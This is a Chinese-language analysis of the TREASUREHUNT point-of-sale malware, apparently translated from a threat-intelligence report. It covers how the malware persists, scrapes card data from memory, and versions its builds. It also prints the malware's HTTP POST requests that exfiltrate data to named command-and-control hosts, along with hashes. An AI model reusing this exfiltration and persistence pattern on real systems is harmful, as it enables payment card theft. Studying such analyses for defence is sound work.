TREASUREHUNT：为黑客特别定制的POS恶意软件工具

　　虽然2015年10月PCI DSS标准发生了改变，但是目前仍然有很多零售商处于启用芯片卡技术的过渡期。于是犯罪分子们就将目光放在了商家使用的pos系统。 仅2015年就发现超过十几种POS恶意软件。

　　POS恶意软件现在分为三类：免费，按价支付以及犯罪分子自己特制。其中，免费工具通常会因为恶意软件源代码的泄露导致软件落后或被安全软件检测出来。购买的POS恶意软件一般是最新开发的或是通过修改旧版本而来的工具。最后一种就是由一个威胁组独自开发为自己所利用。

　　在这篇文章中我们测试了一款名为TREASUREHUNT的软件，这应该是特地为一家主销售盗取的信用卡数据的“dump shop”特地设计的。这个软件通过枚举当前进程从存储器中提取支付卡的信息，然后将该信息发送到一个CnC服务器。

　　TreasureHunter Version 0.1

　　首先简要说明一下，TREASUREHUNT这个名字来自于二进制文件中的一个字符串：

　　C:/Users/Admin/documents/visual studio 2012/Projects/treasureHunter/Release/treasureHunter.pdb

　　TreasureHunter version 0.1 Alpha, created by Jolly Roger

　　(jollyroger@prv.name) for BearsInc. Greets to Xylitol and co.

　　通常情况下，TREASUREHUNT会通过使用以前窃取的凭证或暴力破解植入进一个POS系统。

　　进入系统后，TREASUREHUNT自动安装到%APPDATA%目录下，并建立一个注册表运行键：

　　HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/jucheck

　　然后，恶意软件通过HTTP POST连接到CNC服务器：

　　POST /megastock/gate.php?request=true HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) Host: millionjam[.]eu Content-Length: 78Connection: Keep-Aliverequest=a0edee4769109a&use=6fGhtyNfd97Jqw3&id=[REDACTED]

　　其中POST数据的“请求”值是编码字符串”GETKEYS”。“use”是硬编码也可能是一个标识符。“id”是受损系统的唯一标识符。那么CNC服务器返回的响应应该包含字符串“success”。

　　然后这个恶意软件会扫描所有正在运行的进程(除了System33，Syswow64或/ WINDOWS / explorer.exe的进程)以搜索所有系统内的支付卡数据，再把数据以二进制形式发送到CNC服务器。

　　如果找到支付卡数据就发送到CNC服务器：

　　POST /gate.php?report=true

　　发回的数据有：

　　report=&id=

　　当然，一般运营商会通过CNC服务器上的Web界面来控制受损系统并获取被盗支付卡的信息。

　　我们发现现在能确定的TREASUREHUNT样例中有着相同的编译时间戳——2014-10-19 07:14:39。我们觉得应该是建立的时间而不是实际编译的时间。

　　TREASUREHUNT v0.1 的哈希和CnC信息：

　　reasureHunter Version 0.1.1

　　近期我们又获取了这个TREASUREHUNT的新版本。虽然编译时间戳和以前的版本一样，但是这个版本的不同之处在于它将编码的配置数据存储在了%USERPROFILE%/ ntuser.ini文件中的NTFS备用数据流(ADS)。我们把这些的版本划分为0.1.1版：

　　TreasureHunter version 0.1.1 Alpha, created by Jolly Roger

　　(jollyroger@prv.name) for BearsInc. Greets to Xylitol and co.

　　TREASUREHUNT v0.1.1的哈希和CnC信息：

　　MD5DomainPath

　　2dfddbc240cd6e320f69b172c1e3ce58logmeinrescue.us.com/system/oauth/gate.php

　　时间轴

　　TREASUREHUNT版本之间都具有相同的编译时间，因此我们想来确定恶意软件的开发和使用的时间。我们找到了第一次被VirusTotal发现的日期或FireEye动态威胁情报所发现的CnC服务器域名注册日期。然后基于这些日期，我们终于确定了最早发现的TREASUREHUNT出现在2014年10月编译日期后两个月。下图是TREASUREHUNT活跃的时间轴：

　　现在几乎能确定TREASUREHUNT在2014年底就已经开始了首次部署，并于2015年和2016年开始蔓延使用。

　　而且从采集的样本中我们看到TREASUREHUNT的部署更加具有针对性。

　　地下交易

　　我们发现TREASUREHUNT里有一条可能指向了地下交易的字符串：

　　TreasureHunter version 0.1 Alpha, created by Jolly Roger

　　(jollyroger@prv.name) for BearsInc. Greets to Xylitol and co.

　　BearsInc是一位致力于信用卡诈骗的犯罪分子。他长期在地下论坛中销售被盗的支付卡信息。因此在这里的“BearsInc”很可能表明了这个TREASUREHUNT是为特定犯罪分子专门开发使用的。下图是bearsinc在地下论坛上发布的一则广告：

　　TREASUREHUNT的开发者名为“海盗旗”，电子邮件地址也是jollyroger@prv.name。当然了，这个恶意软件不负其名，其主题也与海盗一致，通过网络接口连接到受损的计算机进行控制。

　　而这个“海盗旗”的艺名和海盗主题不禁让人想起2013年被称为海盗旗偷窃者的恶意软件家族，这个恶意软件被称为“SynapseSoft”。虽然创作者的“艺名”很相近，不过这个“海盗旗”和TREASUREHUNT的作者之间是否有联系我们还不清楚。

　　本文中所介绍的软件及工具具有一定的攻击及危害性，仅作为学习交流使用，严禁用于非法用途。

原文地址:https://hack.77169.com/201604/225897.shtm